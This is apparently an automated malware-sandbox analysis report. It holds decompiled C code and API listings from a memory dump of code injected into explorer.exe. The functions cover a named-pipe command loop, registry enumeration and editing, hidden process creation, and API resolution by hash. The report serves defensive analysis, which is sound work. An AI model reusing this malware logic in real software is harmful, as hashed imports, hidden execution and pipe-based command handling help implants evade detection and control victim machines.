0x000851d5
0x000851df
0x000851e5
0x000851e5
0x0008510c
0x000850f2
0x00000000
0x0008507b
0x00084fa6
0x00084fa9
0x00000000
0x00000000
0x00084faf
0x00084fba
0x00084fbb
0x00084fbc
0x00084fbd
0x00084fc3
0x00084fc8
0x00084fdc
0x00084fe1
0x00084fe5
0x00084ff0
0x00084ff9
0x00084ffb
0x00084fff
0x00085000
0x00085002
0x0008500d
0x00085013
0x00085025
0x00085028
0x0008502b
0x00085038
0x00085040
0x0008504a
0x0008505c
0x00085068
0x0008506d
0x00000000
0x00085002
0x00084f96
0x00084ece
0x00084ece
0x00084ed4
0x00084ed6
0x00000000
0x00000000
0x00084ed8
0x00084edc
0x000851e6
0x000851eb
0x000851f1
0x000851f3
0x000851f4
0x000851f8
0x00085208
0x0008520d
0x00085211
0x00085213
0x00085217
0x0008521c
0x0008521e
0x00085220
0x00085226
0x00085226
0x00085233
0x00085239
0x0008523f
0x00085244
0x00085262
0x00085264
0x00085270
0x00085270
0x00085276
0x00085278
0x0008527e
0x00085290
0x00085296
0x000852a2
0x000852aa
0x000852aa
0x000852aa
0x000852ac
0x000852b2
0x000852b2
0x00084ee2
0x00084ee5
0x00000000
0x00000000
0x00000000
0x00084ee5
0x00084ecc
0x00084e10
0x00084e10
0x00000000
0x00084e10
0x00084d8e
0x00084d95
0x00084d9e
0x00084da0
0x00084da6
0x00084db7
0x00084dc0
0x00084dc0
0x00084dcc
0x00084dd5
0x00084dda
0x00084ddf
0x00000000
0x00000000
0x00084ddf

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DB3
GetModuleHandleA.KERNEL32(00000000), ref: 00084DBA
lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 00085262
lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085276

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 666aed57da788f503969e67adb15fffea7be418e3c828fca5b2e5d92fd45b570
Instruction ID: 53f25a6344485329816dbddeea69770a7089f386737f55672c44d5423dc0334b
Opcode Fuzzy Hash: 666aed57da788f503969e67adb15fffea7be418e3c828fca5b2e5d92fd45b570
Instruction Fuzzy Hash: B4E1CF31608301AFE750FF64DC46BAA77E9BB98314F44092EF584DB2D2DB74E9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 00083294, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00083294() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x14df8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x360020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E0008939F( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081D89(E0008972A( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E000885E5(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E00089187( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C3BB( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081D89(E0008972A( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E00089498( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x360020
							E000896AB( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C35B(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F7E1( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F7E1( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F803( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C35B(_t109);
										} else {
											if(_t76 == 1) {
												E0008F803( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C35B(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x0008329f
0x000832a1
0x000832a3
0x000832a7
0x000832aa
0x000832b6
0x000832c1
0x00000000
0x00000000
0x000832d4
0x000832d8
0x000832d9
0x000832de
0x000832e3
0x000832e9
0x000832f7
0x0008349b
0x00083307
0x00083307
0x00083310
0x00083313
0x000833bb
0x000833bd
0x000833c4
0x000833ca
0x000833d0
0x00083449
0x00083454
0x00083459
0x0008345c
0x000833d2
0x000833d5
0x000833e1
0x000833e3
0x000833e9
0x00083464
0x000833eb
0x000833f0
0x000833f2
0x000833f5
0x000833f7
0x00083405
0x0008340a
0x0008340d
0x0008340e
0x00083413
0x00083416
0x0008341a
0x0008341a
0x0008341f
0x0008342c
0x00083431
0x00083434
0x00083440
0x00083440
0x00083466
0x00083466
0x000833d0
0x00083469
0x0008347d
0x00083482
0x0008348d
0x0008348e
0x00000000
0x00083319
0x00083319
0x0008331c
0x0008338a
0x0008338b
0x0008338e
0x0008338f
0x00083396
0x000833a1
0x000833a3
0x0008331e
0x0008331f
0x00083322
0x00083372
0x00000000
0x00083324
0x00083324
0x00083327
0x0008335c
0x00000000
0x00083329
0x00083329
0x0008332c
0x00083346
0x0008334b
0x0008334e
0x00083379
0x0008337a
0x0008337b
0x00083350
0x00083350
0x00083353
0x00083354
0x00083354
0x0008337d
0x0008337e
0x0008332e
0x00083331
0x0008333b
0x00083361
0x00083361
0x00083366
0x00083367
0x00083490
0x00083490
0x00083491
0x00083496
0x00083496
0x00083331
0x0008332c
0x00083327
0x00083322
0x0008331c
0x00083313
0x000834a7
0x000834af
0x00000000
0x00000000
0x00000000
0x000834af
0x000834bb

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000832B9
GetLastError.KERNEL32 ref: 000832C3

Part of subcall function 0008C35B: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C3A1

DisconnectNamedPipe.KERNEL32 ref: 000834A7

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: 0d7c020e5dfb9dd443787fd22d9e4761d5ac70c4fd310a15b15546c4ac9fbbfa
Instruction ID: 78392571981023932e7177aa36336398959710ce57a23a4f1d66d6d22b7dfe37
Opcode Fuzzy Hash: 0d7c020e5dfb9dd443787fd22d9e4761d5ac70c4fd310a15b15546c4ac9fbbfa
Instruction Fuzzy Hash: 8F51F272A00215AFEB11FFB4CC89AEEBBB8FB85B10F104466F585A2151EB749F04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00086195, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00086195(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E000885E5(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000885E5(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E000885FB( &_v32, 0x3fff);
					E000885FB( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x14dfab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x14dfab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x14dfb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x14dfab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C3D4(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1F3(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x14dfab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x00086195
0x00086195
0x000861a1
0x000861b0
0x000861b3
0x000861bd
0x000861c5
0x000861c8
0x000861d0
0x000861d2
0x000861d5
0x000861da
0x00086346
0x0008634a
0x0008634a
0x000861ea
0x000861ec
0x000861f2
0x00000000
0x00000000
0x00086215
0x00086314
0x00086318
0x0008631a
0x00086322
0x00086322
0x0008632e
0x0008633c
0x00000000
0x00086341
0x0008621e
0x00086222
0x00086226
0x0008622a
0x0008622e
0x0008622f
0x00086230
0x00086231
0x00086232
0x00086236
0x0008623d
0x0008623e
0x00086243
0x0008624e
0x00086263
0x00086265
0x00000000
0x00000000
0x0008626b
0x0008626e
0x00086276
0x00086283
0x00086288
0x0008628b
0x00086294
0x0008629b
0x000862ab
0x000862b5
0x000862bb
0x000862bd
0x000862c2
0x000862cb
0x000862cd
0x000862cf
0x000862d1
0x000862db
0x000862e1
0x000862e5
0x000862e9
0x000862ee
0x000862f4
0x000862f6
0x000862f8
0x000862f8
0x000862ff
0x000862ff
0x000862e5
0x00086304
0x00086304
0x00086307
0x00086308
0x0008630b
0x0008630b
0x00000000
0x0008626e
0x00086250
0x00086258
0x00000000

APIs

memset.MSVCRT ref: 000861B3

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008620D
memset.MSVCRT ref: 00086276
memset.MSVCRT ref: 00086283

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: 63d445e75cebd27c58d853c59da43ad5d69d2482d887b47cb13dbdfd5c869795
Instruction ID: d3b935bb34dd5e753c17b1e2c940759a21ef8d04e8345fe9e9401ef9a991536e
Opcode Fuzzy Hash: 63d445e75cebd27c58d853c59da43ad5d69d2482d887b47cb13dbdfd5c869795
Instruction Fuzzy Hash: A051F7B1A00209AFEF51EF94CC85FEE7BBCBF04740F118069F645A7192DB759A048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A953, Relevance: 6.1, APIs: 4, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0008A953(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x14df8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x0008a95e
0x0008a967
0x0008a96e
0x0008a976
0x0008a97a
0x0008a97b
0x0008a97c
0x0008a97d
0x0008a97e
0x0008a983
0x0008a987
0x0008a98a
0x0008a98a
0x0008a997
0x0008a9b3
0x0008a9f0
0x0008a9b5
0x0008a9b8
0x0008a9ba
0x0008a9bd
0x0008a9c2
0x0008a9ca
0x0008a9d2
0x0008a9d2
0x0008a9ca
0x0008a9e0
0x0008a9e3
0x0008a9eb
0x0008a9eb
0x0008a9f8

APIs

memset.MSVCRT ref: 0008A967
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1ED,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A9AE
GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A9D2
CloseHandle.KERNELBASE(?), ref: 0008A9E0

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CloseCodeCreateExitHandlememset
String ID:
API String ID: 2668540068-0
Opcode ID: 44f48f37d7b1e0fc34509ccac0f21a07841da6e149e04422bcd18e4094f8b25d
Instruction ID: 4b40e9a5d87d3efaeecc27b4a8ada02aa973257df31753976c7ed456381e33e1
Opcode Fuzzy Hash: 44f48f37d7b1e0fc34509ccac0f21a07841da6e149e04422bcd18e4094f8b25d
Instruction Fuzzy Hash: 17215972A10158BFEF50AFA9DC84EEEBBBCFF18340B014426FA51E6561D6349C40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008B054, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0008B054(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x14dfbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B988(_t39);
				_t26 =  *0x9e6b8; // 0x14dfbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BBCF( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x14dfbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C3D4( &_v528) * 2, 0x104);
				return 1;
			}

0x0008b054
0x0008b065
0x0008b077
0x0008b079
0x0008b087
0x0008b096
0x0008b0a1
0x0008b0a9
0x0008b0b6
0x0008b0bc
0x0008b0c0
0x0008b0c2
0x0008b0d6
0x0008b0df
0x0008b0ea
0x0008b0ea
0x0008b0d6
0x0008b0ed
0x0008b0f4
0x0008b112
0x0008b11f

APIs

memset.MSVCRT ref: 0008B079
memset.MSVCRT ref: 0008B087
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B0A1

Part of subcall function 0008B988: GetCurrentThread.KERNEL32(00000008,00000000,6CB00000,00000000,?,?,0008BABE,74EC17D9,6CB00000), ref: 0008B99B
Part of subcall function 0008B988: GetLastError.KERNEL32(?,?,0008BABE,74EC17D9,6CB00000), ref: 0008B9A9
Part of subcall function 0008B988: GetCurrentProcess.KERNEL32(00000008,6CB00000,?,?,0008BABE,74EC17D9,6CB00000), ref: 0008B9C2

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B112

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: f7321fa265df397b34e7fe0a57d7072742dbdc6f6a895fe772b0551e61716fc8
Instruction ID: 557c4b2862d7431dd7c37e65f836cf05bf50ed83ee2e4a5d6d878eaccfa22926
Opcode Fuzzy Hash: f7321fa265df397b34e7fe0a57d7072742dbdc6f6a895fe772b0551e61716fc8
Instruction Fuzzy Hash: A5218EB2501118BFE710EBA4CC89EDA77ACFB49344F0040A5F205D7192EB749E858B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008BF79, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008BF79(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x14dfab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E000885E5(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E000885FB( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x0008bf97
0x0008bf9a
0x0008bf9d
0x0008bfa8
0x0008bfcc
0x0008c009
0x0008c00c
0x0008c00e
0x0008c016
0x0008c016
0x0008c019
0x0008c01b
0x00000000
0x0008c01b
0x0008bfd6
0x0008bfd8
0x0008bfde
0x00000000
0x00000000
0x0008bffa
0x0008c027
0x0008c02a
0x00000000
0x0008c02a
0x0008c002
0x00000000
0x0008c008
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082BFB,00000000), ref: 0008BFA0
RegQueryValueExW.KERNEL32(00000000,00082BFB,00000000,?,00000000,00082BFB,00000000,?,?,00082BFB,00000000), ref: 0008BFC4
RegQueryValueExW.KERNEL32(00000000,00082BFB,00000000,00000000,00000000,00082BFB,?,?,00082BFB,00000000), ref: 0008BFF2
RegCloseKey.KERNEL32(00000000,?,?,00082BFB,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008C027

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 7ba0a6aba72408673ca6fb3d28bb8457ec1ee860120fb8ef9c1e5430db20c7fe
Instruction ID: 4632079a76f7681410473c13cabb9030d18cd389d1f83420d4fcad4ccf15ba59
Opcode Fuzzy Hash: 7ba0a6aba72408673ca6fb3d28bb8457ec1ee860120fb8ef9c1e5430db20c7fe
Instruction Fuzzy Hash: A3212CB5900118FFEB10EFA9DC04E9EBBF8FF88780B1541A6B505E7121D7309A00EB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008BEDD, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008BEDD(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E000885E5(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x0008bef0
0x0008befa
0x0008befd
0x0008bf05
0x00000000
0x0008bf07
0x0008bf0e
0x0008bf28
0x0008bf34
0x0008bf39
0x0008bf57
0x0008bf5c
0x0008bf61
0x0008bf61
0x0008bf5c
0x0008bf39
0x0008bf66
0x0008bf70
0x0008bf70
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,014DFC08,00000000,?,00000002), ref: 0008BF00
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF23
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF50
RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF70

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 69fcf5f2bf0e1a5b560145239583f4f09db6112f73fca264c0e6ac33394cd210
Instruction ID: 08a3d4786b9fcf1215320742e2371db718480cd27cf41c664d751a239e0d4d89
Opcode Fuzzy Hash: 69fcf5f2bf0e1a5b560145239583f4f09db6112f73fca264c0e6ac33394cd210
Instruction Fuzzy Hash: B221B6B5A00148BF9B60EFA9DC84E9EBBF8FB99740B1141A5B945D7121D730DE40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008DFEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008DFEF(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x0008dff8
0x0008dffa
0x0008dffd
0x0008e000
0x0008e006
0x0008e063
0x00000000
0x0008e063
0x0008e008
0x0008e013
0x0008e016
0x0008e01b
0x0008e020
0x0008e023
0x0008e025
0x0008e028
0x0008e02b
0x0008e030
0x00000000
0x00000000
0x00000000
0x00000000
0x0008e032
0x0008e032
0x0008e044
0x0008e051
0x0008e055
0x00000000
0x00000000
0x0008e057
0x0008e05a
0x0008e05b
0x0008e061
0x00000000
0x00000000
0x00000000
0x0008e061
0x0008e078
0x0008e07d
0x0008e081
0x00000000
0x0008e08d
0x0008e08d
